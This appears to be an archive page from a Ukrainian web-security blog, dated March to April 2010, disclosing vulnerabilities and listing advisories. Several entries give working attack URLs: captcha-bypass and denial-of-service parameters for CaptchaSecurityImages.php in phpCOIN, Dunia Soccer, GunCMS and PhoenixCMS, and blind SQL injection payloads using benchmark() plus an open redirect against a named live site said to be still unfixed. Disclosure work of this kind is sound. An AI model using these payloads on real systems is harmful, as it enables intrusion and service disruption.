Архів для категорії 'Уразливості'

Добірка уразливостей

15:38 02.04.2010

В даній добірці уразливості в веб додатках:

Уразливості в phpCOIN

23:51 01.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі phpCOIN. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі phpCOIN 1.6.5 та попередні версії.

Уразливості на bezpeka.com

19:14 01.04.2010

30.09.2009

У лютому, 06.02.2009, я знайшов SQL DB Structure Extraction, SQL Injection, Denial of Service та Redirector уразливості на секюріті сайті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на bezpeka.com.

Детальна інформація про уразливості з’явиться пізніше.

01.04.2010

Раніше сайт працював на домені bezpeka.com, а зараз лише на www.bezpeka.com.

SQL DB Structure Extraction:

http://www.bezpeka.com/ru/redirect/

http://www.bezpeka.com/ru/redirect/?bid=’

http://www.bezpeka.com/ru/redirect/?bcat=’

SQL Injection (сліпа):

http://www.bezpeka.com/ru/redirect/?bid=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)

DoS (через SQL Injection):

http://www.bezpeka.com/ru/redirect/?bid=1%20and%20benchmark(1000000,md5(now()))%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=1%20and%20benchmark(1000000,md5(now()))%23

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua

З даних уразливостей виправлені лише перша та третя SQL DB Structure Extraction та Redirector (і то неякісно). А всі інші уразливості досі не виправлені.

Остання уразливість знову працює при невеликій зміні URL запиту:

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua&bid=1&bcat=1

Уразливість в CB Captcha для Joomla і Mambo

23:56 31.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation уразливість в плагіні CB Captcha (plug_cbcaptcha) для компонента Community Builder (com_comprofiler) для Joomla і Mambo. Про що найближчим часом сповіщу розробників.

Даний плагін базується на скрипті капчі CaptchaSecurityImages.php і про уразливості в CaptchaSecurityImages я вже розповідав. І в плагіні plug_cbcaptcha виправлені всі Insufficient Anti-automation та Denial of Service уразливості з оригінального скрипта, окрім однієї.

Insufficient Anti-automation:

В плагіні можливий обхід капчі з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC. Використовуючи даний метод, можна обходити захист посилаючи один і той же код капчі.

Це може бути використано на всіх сторінках, де використовується даний плагін. Зокрема на сторінці реєстрації, формі втрати паролю та формі втрати емайлу.

Уразливі CB Captcha 1.0.2 та попередні версії, CB Captcha 2.2 та попередні версії.

Зазначу, що версії 1.x та 2.x зроблені різними авторами та мають чимало відмінностей. Зокрема в версії 2.x додана аудіо версія капчі, серед файлів плагіна зокрема з’явився captchaindex.php (який є головним скриптом плагіна, замість cb.captcha.php). Та окрім трьох вищезгаданий форм, капча також захищає контактну форму (при наявності компонента CB Contact 1.1) та форму логіна (при наявності модуля логіна CB 1.2).

Добірка уразливостей

15:35 31.03.2010

В даній добірці уразливості в веб додатках:

  • ToutVirtual VirtualIQ Multiple Vulnerabilities (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-003 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-002 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-001 (деталі)
  • Oracle Updates for Multiple Vulnerabilities (деталі)
  • Multiple security issues in Cute News and UTF-8 Cute News (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • AssetsSoSimple supplier_admin.php Supplier Field XSS (деталі)

Уразливості в Dunia Soccer

23:51 30.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі Dunia Soccer. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/class/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/class/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії Dunia Soccer.

Нові уразливості в Mantis

23:54 29.03.2010

У вересні, 04.09.2009, я знайшов Brute Force та Insufficient Anti-automation уразливості в Mantis (MantisBT). Дані уразливості я виявив на zillya.com, де використовується даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Mantis.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

Добірка уразливостей

15:30 29.03.2010

В даній добірці уразливості в веб додатках:

  • New ejabberd packages fix cross-site scripting (деталі)
  • Bractus SunTrack Multiple XSS (деталі)
  • New TYPO3 packages fix several vulnerabilities (деталі)
  • eoCMS SQL injection vulnerability - Bkis Report (деталі)
  • Oracle TimesTen Remote Format String (деталі)
  • Oracle BEA WebLogic Server Apache Connector Buffer Overflow (деталі)
  • Oracle Secure Backup Multiple Denial Of Service vulnerabilities (деталі)
  • Oracle Secure Backup’s observiced.exe Denial Of Service vulnerability (деталі)
  • Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability (деталі)
  • Zervit Webserver Buffer Overflow (деталі)

Уразливості в GunCMS та PhoenixCMS PHP Edition

23:52 27.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системах GunCMS та PhoenixCMS PHP Edition. Про що найближчим часом сповіщу розробників.

GunCMS включає в себе HoloCMS 3.1 і відповідно її уразливості. А PhoenixCMS PHP Edition базується на HoloCMS. Дані уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

В GunCMS:
http://site/path/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

В PhoenixCMS PHP Edition:
http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

В GunCMS:
http://site/path/captcha/CaptchaSecurityImages.php?width=1000&height=9000

В PhoenixCMS PHP Edition:
http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії GunCMS.

Уразливі PhoenixCMS PHP Edition 1.0.1 та попередні версії.

Витік інформації про версію системи №4

22:48 27.03.2010

Продовжу тему витоку інформації про версію системи. Як я зазначав, виведення версії системи - це поширена функція у веб додатках та веб системах. Багато різних движків виводять інформацію про версію системи і дана можливість движків є уразливістю. Це витік інформації (Information Leakage) про версію системи, що може бути використаний для атаки на сайти, що використовують даний движок.

Наведу нові приклади Information Leakage уразливостей в різних веб додатках, що приводять до витоку інформації про версію системи.

W-Agora

В W-Agora на деяких сторінках в мета-тегах виводиться версія системи (w-agora version 4.1.5).

Mantis

В Mantis (MantisBT) версію системи можна дізнатися в файлі http://site/doc/ChangeLog.

Coppermine Photo Gallery:

В CPG на кожній сторінці веб додатку виводиться його версія (Coppermine Photo Gallery v1.2.2b).

coWiki

В coWiki є декілька витоків інформації:

  • На кожній сторінці в коментарі виводиться версія системи (coWiki 0.3.4).
  • На кожній сторінці в мета-тезі виводиться версія системи (coWiki 0.3.4).
  • На кожній сторінці виводиться версія системи (coWiki 0.3.4).

eNvolution

В eNvolution версію системи можна дізнатися в файлах /config/install_log.txt, /instalacja.txt, /instalar.txt, /install.txt, /installa.txt, /installdeu.txt, /installer.txt та /where_to_get_support.txt.